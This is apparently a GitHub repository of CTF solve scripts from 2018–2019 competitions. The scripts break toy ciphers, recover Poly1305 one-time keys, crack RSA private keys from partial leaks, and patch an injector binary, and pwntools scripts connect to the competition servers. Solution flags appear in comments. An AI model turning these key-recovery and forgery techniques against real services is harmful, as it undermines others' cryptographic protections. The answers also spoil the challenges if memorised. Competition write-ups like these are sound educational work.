  7 | p = '010000010110111000100000011000010111000001110000011011000110010100100000011000010110111001100100001000000110000101101110001000000110111101110010011000010110111001100111011001010010000001110111011001010110111001110100001000000111010001101111001000000101010001110010011001010110111001100100'
  8 | 
  9 | c = '000100100011000101110101001101100110001100110001001110100011110101100000011110010010111000110011001110000000110100100101011111000011000000100001010000100110011100100001011000000111001101110100011011100110000000100000011011010110001001100100001011010110111001100110001010110110110101110001'
 10 | 
 11 | cipher = '000000110000111001011100001000000001100100101100000100100111111000001001000001100000001100001001000100100010011101001010011000010111100100100010010101110100010001000010010101010100010101111111010001000110000001101001011111110111100001100101011000010010001001001011011000100111001001101011'
 12 | 
 13 | n = 144
 14 | 
 15 | def cmsg(m):
 16 |     c = 0
 17 |     if "m0" in m:
 18 |         c += 1
 19 |     if "m1" in m:
 20 |         c += 1
 21 |     return c
 22 | 
 23 | def bin2int(x):
 24 |     return int(x[:n], 2), int(x[n:], 2)
 25 | 
 26 | def find_one_pt(ml, mr):
 27 |     cl = cmsg(ml)
 28 |     cr = cmsg(mr)
 29 | 
 30 |     if cl == 1:
 31 |         return True
 32 |     else:
 33 |         assert(cr == 1)
 34 |         return False
 35 | 
 36 | def int2str(i):
 37 |     h = hex(int(''.join([bin(k)[2:].rjust(n, '0') for k in i]), 2))
 38 |     if h[-1] == 'L':
 39 |         h = h[:-1]
 40 |     h = h[2:]
 41 |     if len(h) % 2 == 1:
 42 |         h = "0" + h
 43 |     return h.decode("hex")
 44 | 
 45 | def str2bin(s):
 46 |     return bin(int(s.encode("hex"), 16))[2:].rjust(2 * n, '0')
 47 | 
 48 | def encrypt(ms1, ms2, round=16):
 49 |     keys = []
 50 |     for i in xrange(round):
 51 |         keys.append(int(os.urandom(n / 8).encode("hex"), 16))
 52 | 
 53 |     # encrypt ms1
 54 |     for i in xrange(round):
 55 |         ts = [copy.copy(ms1[0]), copy.copy(ms1[1])]
 56 |         ms1 = [ts[1], ts[0] ^ ts[1] ^ keys[i]]
 57 | 
 58 |     # encrypt ms2
 59 |     for i in xrange(round):
 60 |         ts = [copy.copy(ms2[0]), copy.copy(ms2[1])]
 61 |         ms2 = [ts[1], ts[0] ^ ts[1] ^ keys[i]]
 62 | 
 63 |     return ms1, ms2
 64 | 
 65 | # ps = bin2int(p)
 66 | # print(int2str(ps))
 67 | # 
 68 | # p = str2bin("A"*36)
 69 | # k = str2bin("B"*36)
 70 | # 
 71 | # ks = bin2int(k)
 72 | # ps = bin2int(p)
 73 | # 
 74 | # cs, es = encrypt(ps, ks, 1)
 75 | 
 76 | ps = bin2int(p)
 77 | cs = bin2int(c)
 78 | es = bin2int(cipher)
 79 | 
 80 | s = set()
 81 | for i in xrange(8):
 82 |     ms = [{'m0'}, {'m1'}]
 83 | 
 84 |     for j in xrange(i):
 85 |         ts = [copy.copy(ms[0]), copy.copy(ms[1])]
 86 |         ms = [ts[1], xor(ts[0], xor(ts[1], {"k%d" % j}))]
 87 | 
 88 |     ks = [None, None]
 89 |     used1 = used2 = None
 90 | 
 91 |     for j in xrange(2):
 92 | 
 93 |         # count the number of mx
 94 |         count = 0
 95 | 
 96 |         for k in xrange(2):
 97 |             if "m%d" % k in ms[j]:
 98 |                 count += 1
 99 |                 solo = k
100 | 
101 |         if count == 1:
102 |             # we can recover this...
103 |             ks[solo] = ps[solo] ^ cs[j] ^ es[j]
104 |             used1 = solo
105 |             used2 = j
106 |     print(ks, ms)
107 |     for j in xrange(2):
108 |         if ks[j] == None:
109 |             print(j, 1-used2)
110 |             ks[j] = ks[1-j] ^ ps[j] ^ ps[1-j]^ cs[1-used2] ^ es[1-used2]
111 | 
112 |     print(repr(int2str(ks)))
113 | 


--------------------------------------------------------------------------------
/2018/trendmicro/injector/NOTE:
--------------------------------------------------------------------------------
1 | This program injects a code to notepad.exe
2 | Find the injected code and copy to the program
3 | Then, it prints out ROT-13 encrypted key.
4 | 
5 | 


--------------------------------------------------------------------------------
/2018/trendmicro/injector/inject_code.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2018/trendmicro/injector/inject_code.bin


--------------------------------------------------------------------------------
/2018/trendmicro/injector/patch.py:
--------------------------------------------------------------------------------
1 | x = open("inject_code.bin", "rb").read()
2 | y = x[0xb700:0xb700+0x179]
3 | 
4 | # patch
5 | x = open("injector.exe", "rb").read()
6 | start = x.index("\x8B\xEC\x83\x25\xEC")
7 | new = x[:start] + y + x[start + len(y):]
8 | open("injected.exe", "wb").write(new)
9 | 


--------------------------------------------------------------------------------
/2018/trendmicro/qrcode/extract.py:
--------------------------------------------------------------------------------
 1 | from PIL import Image
 2 | im = Image.open("qrcode.png")
 3 | pixels = list(im.getdata())
 4 | width, height = im.size
 5 | pixels = [pixels[i * width:(i + 1) * width] for i in xrange(height)]
 6 | 
 7 | def white(pixel):
 8 |     return (not (pixel[0] == 255 and pixel[1] == 255 and pixel[2] == 255)
 9 |             and (pixel[0] > 200 and pixel[1] > 200 and pixel[2] > 200))
10 | 
11 | def black(pixel):
12 |     return pixel[0] == 0 and pixel[1] == 0 and pixel[2] == 0
13 | 
14 | # 28 x 29
15 | 
16 | # 455 x 107
17 | 
18 | sx = 107
19 | sy = 455 - 28 * 12
20 | 
21 | for x in xrange(25):
22 |     for y in xrange(25):
23 |         nb = nw = 0
24 |         for i in xrange(29):
25 |             for j in xrange(28):
26 |                 pixel = pixels[sx+i+x*29][sx+j+y*28]
27 |                 if white(pixel):
28 |                     nw += 1
29 |                 if black(pixel):
30 |                     nb += 1
31 | 
32 |         cell = "?"
33 |         if nb > 400:
34 |             cell = "X"
35 |         if nw > 400:
36 |             cell = "_"
37 |         import sys
38 |         sys.stdout.write(cell)
39 |     print
40 | 
41 | # side = 20
42 | # 
43 | # for i in xrange(width - side):
44 | #     for j in xrange(height - side):
45 | #         colors = []
46 | # 
47 | #         # check all 0
48 | #         for x in xrange(i, i + side):
49 | #             for y in xrange(j, j + side):
50 | #                 if pixels[x][y] == (0, 0, 0):
51 | #                     print(x, y)
52 | 


--------------------------------------------------------------------------------
/2018/trendmicro/qrcode/qrcode.txt:
--------------------------------------------------------------------------------
 1 | XXXXXXX XXX X  XX????????
 2 | X     X       XXX????????
 3 | X XXX X XX  X  XX????????
 4 | X XXX X XXX   X  ????????
 5 | X XXX X  XX    XX????????
 6 | X     X XX XXX X ????????
 7 | XXXXXXX X X X X X????????
 8 |         X  XX X ?????????
 9 |  X X XXXX  XX   X????????
10 | X  XX  X    X   X????????
11 |   X X X  XXXX   X????????
12 | XX XXX X  X   XX ????????
13 | X XXXXX XX X     ????????
14 |    XXX X X X X  X????????
15 | X XX XXXXX XX X X????????
16 |  X X X      X X X????????
17 | XXX XXX X X   XXX????????
18 |         X   X XXX????????
19 | XXXXXXX XXX X X X????????
20 | X     X X XXXXX X????????
21 | X XXX X  XXX  X XX???????
22 | X XXX X X X XXX  X???????
23 | X XXX X  X X  XXXX???????
24 | X     X XXXXX XXX ???????
25 | XXXXXXX         XX???????
26 | 


--------------------------------------------------------------------------------
/2019/36c3/dumb_theory/brute.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | import random, struct, re, sys, hashlib, random
 3 | import uuid
 4 | import string
 5 | from itertools import permutations
 6 | 
 7 | target = 'Hello hxp! I would like the flag, please. Thank you.'
 8 | sig = "194569243600128472648342062015620900945718581078353494173333401884054850875530382148788323494132802992884273082200320646651180352429907523311545856531272571557995231739584447242824136038315350789722394381806616996555843201523819424099077350366566358575422722891407165|314349122978694434728684551561785469671849651010192101852953772287589557164109198450542386488424813283093163293376716415751164644227670469718686163362061243159503308486098499593894485545338601338971836042612377812338158418346018686347280572903202583733835245827431772|658809427923956640086186443976234062250773752182448289480474291104895707005936993494036371238492142720002302358792427690877581902347063117281943450254452527933934095614085703137066436116219390382878503503393010711111950989780697508858596625399707429535328743518976972"
 9 | 
10 | import uuid
11 | prefix = str(uuid.uuid4())
12 | 
13 | print("PREFIX: %s" % prefix)
14 | r = 3
15 | def H(msg):
16 |     h = hashlib.sha256(msg.encode()).digest()
17 |     v = tuple(c+1 for c in struct.unpack(f'>{r}H', h[:r+r]))
18 |     return v
19 | 
20 | def gen_msg():
21 |     for x in range(0x110000):
22 |         # check if x is fine
23 |         try:
24 |             msg = 'Hello hxp! I would like the flag, please%c Thank you.' % (x)
25 |             data = '%s Signature: %s' % (msg, sig)
26 |             m = re.match(f'({target}) Signature: ([0-9|]+)', data)
27 |             if not m:
28 |                 continue
29 |         except UnicodeEncodeError:
30 |             continue
31 | 
32 |         for y in range(0x110000):
33 |             try:
34 |                 msg = 'Hello hxp! I would like the flag, please%c Thank you%c' % (x, y)
35 |                 data = '%s Signature: %s' % (msg, sig)
36 |                 m = re.match(f'({target}) Signature: ([0-9|]+)', data)
37 |                 if m:
38 |                     yield msg, x, y, H(msg)
39 |             except UnicodeEncodeError:
40 |                 continue
41 | 
42 | def scalar_mul(k, t):
43 |     return tuple([x * k for x in t])
44 | 
45 | def gen_random():
46 |     v = []
47 |     for p in permutations(string.ascii_letters + string.digits, 8):
48 |         s = prefix + ''.join(p)
49 |         yield s, H(s)
50 | 
51 | map_rand = {}
52 | map_msg = {}
53 | for rand, msg in zip(gen_random(), gen_msg()):
54 |     rand_str, rand_hash = rand
55 |     msg_str, x, y, msg_hash = msg
56 | 
57 |     if max(rand_hash) < (65536 / 2):
58 |         d = scalar_mul(2, rand_hash)
59 |         if d in map_rand:
60 |             print("[+] Found rand-rand pair")
61 |             print("s1: %s, h1: %s" % (rand_str, H(rand_str)))
62 |             s2 = map_rand[d]
63 |             print("s2: %s, h2: %s" % (s2, H(s2)))
64 | 
65 |         if d in map_msg:
66 |             print("[+] Found rand-msg pair")
67 |             print("s1: %s, h1: %s" % (rand_str, H(rand_str)))
68 |             s2, c1, c2 = map_msg[d]
69 |             print("msg: %s, c1: %d, c2: %d, h2: %s" % (s2, c1, c2, H(s2)))
70 | 
71 |     map_rand[rand_hash] = rand_str
72 | 
73 |     if max(msg_hash) < (65536 / 2):
74 |         d = scalar_mul(2, rand_hash)
75 |         if d in map_rand:
76 |             print("[+] Found rand-msg pair")
77 |             print("msg: %s, c1: %d, c2: %d, h2: %s" % (msg_str, x, y, H(msg_str)))
78 |             s1 = map_rand[d]
79 |             print("s1: %s, h1: %s" % (s1, H(s1)))
80 | 
81 |     map_msg[msg_hash] = (msg_str, x, y)
82 | 
83 |     if (len(map_msg) % 0x100000) == 0:
84 |         print("[+] Tick: %s" % len(map_msg))
85 | 


--------------------------------------------------------------------------------
/2019/36c3/dumb_theory/calc.sage:
--------------------------------------------------------------------------------
 1 | def readn():
 2 |     x = int(raw_input())
 3 |     return x
 4 | 
 5 | n = readn()
 6 | Z = IntegerModRing(n, is_field=True)
 7 | F.<x> = PolynomialRing(Z)
 8 | Q.<y> = F.quotient(x^3 - 7)
 9 | 
10 | sig1 = Q((readn(), readn(), readn()))
11 | sig2 = Q((readn(), readn(), readn()))
12 | print((sig1 * sig2^-1).list())
13 | 


--------------------------------------------------------------------------------
/2019/36c3/nacht/solve.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | import os, ctypes
 3 | from Crypto.Util.number import bytes_to_long, long_to_bytes, inverse
 4 | 
 5 | lib = ctypes.CDLL('./tweetnacl.so')
 6 | 
 7 | def mac(key, msg):
 8 |     tag = ctypes.create_string_buffer(16)
 9 |     lib.crypto_onetimeauth_poly1305_tweet(tag, key, len(msg), msg)
10 |     return bytes(tag)
11 | 
12 | def chk(key, tag, msg):
13 |     return not lib.crypto_onetimeauth_poly1305_tweet_verify(tag, key, len(msg), msg)
14 | 
15 | def le_bytes_to_num(s):
16 |     return bytes_to_long(s[::-1])
17 | 
18 | def num_to_16_le_bytes(n):
19 |     return long_to_bytes(n)[::-1]
20 | 
21 | p = (1 << 130) - 5
22 | 
23 | from pwn import *
24 | 
25 | r = remote('88.198.156.141', 2833)
26 | #r = process("python3", "-u", "./vuln.py")
27 | messages = []
28 | for i in range(32):
29 |     x, y = r.readline().split()
30 |     messages.append((bytes.fromhex(x.decode()), bytes.fromhex(y.decode())))
31 | 
32 | for i in range(0, 32):
33 |     for j in range(i + 1, 32):
34 |         k1, t1 = messages[i]
35 |         r1, s1 = le_bytes_to_num(k1[:16]), le_bytes_to_num(k1[16:])
36 |         r1 &= 0x0ffffffc0ffffffc0ffffffc0fffffff
37 |         t1 = le_bytes_to_num(t1)
38 | 
39 |         k2, t2 = messages[j]
40 |         r2, s2 = le_bytes_to_num(k2[:16]), le_bytes_to_num(k2[16:])
41 |         r2 &= 0x0ffffffc0ffffffc0ffffffc0fffffff
42 |         t2 = le_bytes_to_num(t2)
43 | 
44 |         m1 = ((t1 - s1) * r2 - (t2 - s2) * r1) * inverse(r2 * r1 * r1 - r2 * r2 * r1, p)
45 |         m2 = ((t1 - s1) * r2 * r2 - (t2 - s2) * r1 * r1) * inverse(r1 * r2 * r2 - r2 * r1 * r1, p)
46 |         m1 %= p
47 |         m2 %= p
48 | 
49 |         lsb1 = (m1 & (0xff << 128)) >> 128
50 |         lsb2 = (m2 & (0xff << 128)) >> 128
51 |         if lsb1 == 1 and lsb2 == 1:
52 |             m1 -= (1 << 128)
53 |             m2 -= (1 << 128)
54 |             key = num_to_16_le_bytes(m1) + num_to_16_le_bytes(m2)
55 |             break
56 | 
57 | x, y = r.readline().split()
58 | print(key)
59 | msg = bytes.fromhex(x.decode())
60 | r.write(mac(key, msg).hex() + "\n")
61 | print(r.readline())
62 | # hxp{Oo0o0oO0oo0ps_5t1lL_uPf0cK4bL3}
63 | 


--------------------------------------------------------------------------------
/2019/defcon/chainedrsa/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	g++ -o crack crack.cpp -lcrypto -lssl
3 | 


--------------------------------------------------------------------------------
/2019/defcon/chainedrsa/crack.cpp:
--------------------------------------------------------------------------------
  1 | #include <openssl/pem.h>
  2 | #include <assert.h>
  3 | #include <string.h>
  4 | 
  5 | #if OPENSSL_VERSION_NUMBER < 0x10100005L
  6 | static void RSA_get0_key(const RSA *r,
  7 |     const BIGNUM **n, const BIGNUM **e, const BIGNUM **d)
  8 | {
  9 |   if (n != NULL)
 10 |     *n = r->n;
 11 |   if (e != NULL)
 12 |     *e = r->e;
 13 |   if (d != NULL)
 14 |     *d = r->d;
 15 | }
 16 | 
 17 | #endif
 18 | 
 19 | int main(int argc, char** argv) {
 20 |   char * dir = argv[1];
 21 |   char buf[0x1000];
 22 |   char filename[0x100];
 23 |   EVP_PKEY* pkey = EVP_PKEY_new();
 24 |   sprintf(filename, "%s/PUB", dir);
 25 |   FILE* fp = fopen(filename, "r");
 26 |   assert(fp != NULL);
 27 |   RSA* rsa = PEM_read_RSA_PUBKEY(fp, NULL, NULL, NULL);
 28 |   const BIGNUM *n;
 29 |   const BIGNUM *e;
 30 |   RSA_get0_key(rsa, &n, &e, 0);
 31 |   printf("n: %s\n", BN_bn2dec(n));
 32 | 
 33 |   // read pd
 34 |   BIGNUM *pd = BN_new();
 35 |   memset(buf, 0, sizeof(buf));
 36 |   sprintf(filename, "%s/PD", dir);
 37 |   fp = fopen(filename, "r");
 38 |   assert(fp != NULL);
 39 |   fgets(buf, sizeof(buf), fp);
 40 |   fclose(fp);
 41 |   BN_dec2bn(&pd, buf);
 42 |   printf("pd: %s\n", BN_bn2dec(pd));
 43 | 
 44 |   // read bit
 45 |   int bit = 0;
 46 |   memset(buf, 0, sizeof(buf));
 47 |   sprintf(filename, "%s/BIT", dir);
 48 |   fp = fopen(filename, "r");
 49 |   assert(fp != NULL);
 50 |   fgets(buf, sizeof(buf), fp);
 51 |   bit = atoi(buf);
 52 |   fclose(fp);
 53 |   printf("bit: %d\n", bit);
 54 | 
 55 |   char* e_10 = BN_bn2dec(e);
 56 |   int e_int = atoi(e_10);
 57 |   BIGNUM *b_2 = BN_new();
 58 |   BN_dec2bn(&b_2, "2");
 59 | 
 60 |   BIGNUM* b_1 = BN_new();
 61 |   BN_dec2bn(&b_1, "1");
 62 | 
 63 |   for (int gcd = 2; gcd < 1000; gcd++) {
 64 |     char buf[0x100];
 65 |     sprintf(buf, "%d", gcd);
 66 |     BIGNUM *b_gcd = BN_new();
 67 |     BN_dec2bn(&b_gcd, buf);
 68 | 
 69 |     for (int k_int = 0; k_int <= e_int; k_int++) {
 70 |       if ((k_int % 0x1000) == 0)
 71 |         fprintf(stderr, "%d %d\n", gcd, k_int);
 72 | 
 73 |       BN_CTX *ctx = BN_CTX_new();
 74 |       char kbuf[0x100];
 75 |       BIGNUM *k = BN_CTX_get(ctx);
 76 |       sprintf(kbuf, "%d", k_int);
 77 |       BN_dec2bn(&k, kbuf);
 78 | 
 79 |       BIGNUM *denom = BN_CTX_get(ctx);
 80 |       BN_mul(denom, b_gcd, b_2, ctx);
 81 | 
 82 |       // d_a = (k * N / gcd + 1) / e
 83 |       BIGNUM *phi_g = BN_CTX_get(ctx);
 84 |       BN_div(phi_g, NULL, n, denom, ctx);
 85 | 
 86 |       BIGNUM* t = BN_CTX_get(ctx);
 87 |       BN_mul(t, k, phi_g, ctx);
 88 | 
 89 |       BN_add(t, t, b_1);
 90 | 
 91 |       BIGNUM* d_h = BN_CTX_get(ctx);
 92 |       BN_div(d_h, NULL, t, e, ctx);
 93 | 
 94 |       BN_rshift(d_h, d_h, bit);
 95 |       BN_lshift(d_h, d_h, bit);
 96 | 
 97 |       // d = t | pd
 98 |       BIGNUM *d = BN_CTX_get(ctx);
 99 |       BN_add(d, d_h, pd);
100 | 
101 |       BN_mul(t, e, d, ctx);
102 | 
103 |       BIGNUM *t2 = BN_CTX_get(ctx);
104 |       BN_mod_exp(t2, b_2, t, n, ctx);
105 | 
106 |       if (!BN_cmp(t2, b_2)) {
107 |         printf("Found: %s, %s", dir, BN_bn2dec(d));
108 |         exit(-1);
109 |       }
110 | 
111 | next:
112 |       BN_CTX_free(ctx);
113 |     }
114 |     BN_free(b_gcd);
115 |   }
116 | 
117 |   BN_free(pd);
118 |   EVP_PKEY_free(pkey);
119 | }
120 | 


--------------------------------------------------------------------------------
/2019/defcon/chainedrsa/crack.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import subprocess
 3 | import sys
 4 | 
 5 | if not os.path.exists("log"):
 6 |     os.makedirs("log")
 7 | 
 8 | procs = []
 9 | dirp = "data"
10 | 
11 | for name in os.listdir(dirp):
12 |     path = ["./crack", "%s/%s" % (dirp, name)]
13 |     print(path)
14 | 
15 |     ofp = open("log/%s.out" % (name), "w")
16 |     efp = open("log/%s.err" % ( name), "w")
17 |     procs.append(subprocess.Popen(path, stdout=ofp, stderr=efp))
18 | 
19 | for p in procs:
20 |     p.communicate()
21 | 


--------------------------------------------------------------------------------
/2019/defcon/chainedrsa/crawl.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from Crypto.PublicKey import RSA
 3 | 
 4 | from multiprocessing import Pool
 5 | 
 6 | 
 7 | s = set()
 8 | 
 9 | while True:
10 |     r = remote('chainedrsa.quals2019.oooverflow.io', 5000)
11 |     dirp = "data"
12 | 
13 |     if not os.path.exists(dirp):
14 |         os.mkdir(dirp)
15 | 
16 |     seed = int(r.readline()[len('Seed: '):], 16)
17 |     pubkey = r.recvuntil('-----END PUBLIC KEY-----\n')
18 | 
19 |     pd, bit = r.readline()[6:].split(', ')
20 |     pd = int(pd, 16)
21 |     bit = int(bit, 10)
22 | 
23 |     digest = r.readline()[len('Digest: '):].strip()
24 |     enc_msg = int(r.readline()[len('Encrypted Msg: '):], 16)
25 | 
26 |     if not digest in s:
27 |         os.mkdir('%s/%s' % (dirp, digest))
28 |         open('%s/%s/DIGEST' % (dirp, digest), 'w').write(digest)
29 |         open('%s/%s/PUB' % (dirp, digest), 'w').write(pubkey)
30 |         open('%s/%s/PD' % (dirp, digest), 'w').write(str(pd))
31 |         open('%s/%s/BIT' % (dirp, digest), 'w').write(str(bit))
32 |         open('%s/%s/ENC' % (dirp, digest), 'w').write(str(enc_msg))
33 |         s.add(digest)
34 |         print('add %s' % digest)
35 | 
36 |     r.close()
37 | 


--------------------------------------------------------------------------------
/2019/defcon/chainedrsa/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from Crypto.Cipher import PKCS1_v1_5
 3 | from Crypto.PublicKey import RSA
 4 | from Crypto.Util.number import *
 5 | import glob
 6 | import re
 7 | 
 8 | #context.log_level = 'DEBUG'
 9 | 
10 | def read_privkeys():
11 |     privkeys = {}
12 |     for path in glob.glob('log/*.out'):
13 |         name = os.path.basename(path)
14 |         digest = name[:-4]
15 |         key = open(os.path.join('data/%s/PUB') % digest).read()
16 | 
17 |         data = open(path).read()
18 |         m = re.search('Found: .*, (.*)', data)
19 |         if m:
20 |             privkeys[key] = int(m.groups()[0], 10)
21 |     return privkeys
22 | 
23 | 
24 | privkeys = read_privkeys()
25 | print('Found keys: %d' % len(privkeys))
26 | 
27 | flag = ""
28 | answers = []
29 | 
30 | while True:
31 |     try:
32 |         trial = 0
33 |         r = remote('chainedrsa.quals2019.oooverflow.io', 5000)
34 | 
35 |         seed = int(r.readline()[len('Seed: '):], 16)
36 | 
37 |         while True:
38 |             pubkey = r.recvuntil('-----END PUBLIC KEY-----\n')
39 | 
40 |             pd, bit = r.readline()[6:].split(', ')
41 |             pd = int(pd, 16)
42 |             bit = int(bit, 10)
43 | 
44 |             digest = r.readline()[len('Digest: '):].strip()
45 |             enc_msg = r.readline()[len('Encrypted Msg: '):].strip().decode('hex')
46 | 
47 |             if len(answers) > trial:
48 |                 msg = answers[trial]
49 |             else:
50 |                 if pubkey in privkeys:
51 |                     rsa_pub = RSA.importKey(pubkey)
52 | 
53 |                     d = privkeys[pubkey]
54 |                     n, e = rsa_pub.n, rsa_pub.e
55 | 
56 |                     rsa_priv = RSA.construct((n, e, d, 0L, 0L, 0L))
57 |                     cipher = PKCS1_v1_5.new(rsa_priv)
58 | 
59 |                     msg = ''
60 |                     xor_msg = cipher.decrypt(enc_msg, 1)
61 | 
62 |                     hex_digest = digest.decode('hex')
63 | 
64 |                     for i, ch in enumerate(xor_msg):
65 |                        msg += chr(ord(ch) ^ ord(hex_digest[i]))
66 |                     answers.append(msg)
67 |                     flag += msg.strip()[-1]
68 |                     print('Flag: %s' % flag)
69 | 
70 |                 else:
71 |                     print('Failed to find a priv key for digest: %s' % digest)
72 |                     time.sleep(1)
73 |                     break
74 | 
75 |             print('%s: %s' % (trial, msg))
76 |             r.sendline(msg)
77 |             r.recvuntil('Yes, continue\n')
78 |             trial += 1
79 | 
80 | 
81 |     finally:
82 |         r.close()
83 | 
84 | # flag: OOO{pr0f35510n4l_r54_br34k3r}
85 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | CTF-writeup
2 | ===========
3 | 
4 | Collection of CTF writeup (only exploits with simple description.)
5 | 


--------------------------------------------------------------------------------